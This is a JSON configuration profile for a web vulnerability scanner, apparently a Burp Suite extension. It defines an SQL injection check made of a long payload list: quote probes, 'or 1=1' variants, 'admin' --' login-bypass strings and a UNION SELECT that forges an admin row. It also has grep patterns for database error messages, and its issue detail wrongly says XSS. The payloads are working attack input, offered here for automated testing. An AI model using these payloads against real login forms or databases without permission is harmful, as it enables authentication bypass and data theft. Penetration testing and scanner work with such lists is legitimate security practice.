[
 {
  "Name": "SQLi", 
  "Active": false, 
  "Scanner": 1, 
  "Payloads": [
   "'-'", 
   "' '", 
   "'&'", 
   "'^'", 
   "'*'", 
   "' or ''-'", 
   "' or '' '", 
   "' or ''&'", 
   "' or ''^'", 
   "' or ''*'", 
   "\"-\"", 
   "\" \"", 
   "\"&\"", 
   "\"^\"", 
   "\"*\"", 
   "\" or \"\"-\"", 
   "\" or \"\" \"", 
   "\" or \"\"&\"", 
   "\" or \"\"^\"", 
   "\" or \"\"*\"", 
   "or true--", 
   "\" or true--", 
   "' or true--", 
   "\") or true--", 
   "') or true--", 
   "' or 'x'='x", 
   "') or ('x')=('x", 
   "')) or (('x'))=(('x", 
   "\" or \"x\"=\"x", 
   "\") or (\"x\")=(\"x", 
   "\")) or ((\"x\"))=((\"x", 
   "or 1=1", 
   "or 1=1-- ", 
   "or 1=1#", 
   "or 1=1/*", 
   "admin' --", 
   "admin' #", 
   "admin'/*", 
   "admin' or '1'='1", 
   "admin' or '1'='1'--", 
   "admin' or '1'='1'#", 
   "admin' or '1'='1'/*", 
   "admin'or 1=1 or ''='", 
   "admin' or 1=1", 
   "admin' or 1=1--", 
   "admin' or 1=1#", 
   "admin' or 1=1/*", 
   "admin') or ('1'='1", 
   "admin') or ('1'='1'--", 
   "admin') or ('1'='1'#", 
   "admin') or ('1'='1'/*", 
   "admin') or '1'='1", 
   "admin') or '1'='1'--", 
   "admin') or '1'='1'#", 
   "admin') or '1'='1'/*", 
   "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", 
   "admin\" --", 
   "admin\" #", 
   "admin\"/*", 
   "admin\" or \"1\"=\"1", 
   "admin\" or \"1\"=\"1\"--", 
   "admin\" or \"1\"=\"1\"#", 
   "admin\" or \"1\"=\"1\"/*", 
   "admin\"or 1=1 or \"\"=\"", 
   "admin\" or 1=1", 
   "admin\" or 1=1--", 
   "admin\" or 1=1#", 
   "admin\" or 1=1/*", 
   "admin\") or (\"1\"=\"1", 
   "admin\") or (\"1\"=\"1\"--", 
   "admin\") or (\"1\"=\"1\"#", 
   "admin\") or (\"1\"=\"1\"/*", 
   "admin\") or \"1\"=\"1", 
   "admin\") or \"1\"=\"1\"--", 
   "admin\") or \"1\"=\"1\"#", 
   "admin\") or \"1\"=\"1\"/*", 
   "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055"
  ], 
  "Encoder": [], 
  "UrlEncode": false, 
  "CharsToUrlEncode": "", 
  "Grep": [
   "Microsoft OLE DB Provider for ODBC Drivers error", 
   "You have an error in your SQL syntax", 
   "ORA-00933: SQL command not properly ended", 
   "Microsoft SQL Native Client error", 
   "Query failed: ERROR: syntax error at or near"
  ], 
  "PayloadResponse": false, 
  "NotResponse": false, 
  "NotCookie": false, 
  "TimeOut": 0, 
  "isTime": false, 
  "CaseSensitive": false, 
  "isReplace": false, 
  "ExcludeHTTP": false, 
  "OnlyHTTP": false, 
  "IsContentType": false, 
  "ContentType": "", 
  "NegativeCT": false, 
  "IsResponseCode": false, 
  "ResponseCode": "", 
  "NegativeRC": false, 
  "MatchType": 1, 
  "RedirType": 0, 
  "MaxRedir": 0, 
  "rCookies": false, 
  "spaceEncode": false, 
  "payloadPosition": 0, 
  "IssueName": "SQLInjection", 
  "IssueSeverity": "High", 
  "IssueConfidence": "Certain", 
  "IssueDetail": "XSS en con el payload:   <grep>", 
  "RemediationDetail": "", 
  "IssueBackground": "", 
  "RemediationBackground": ""
 }
]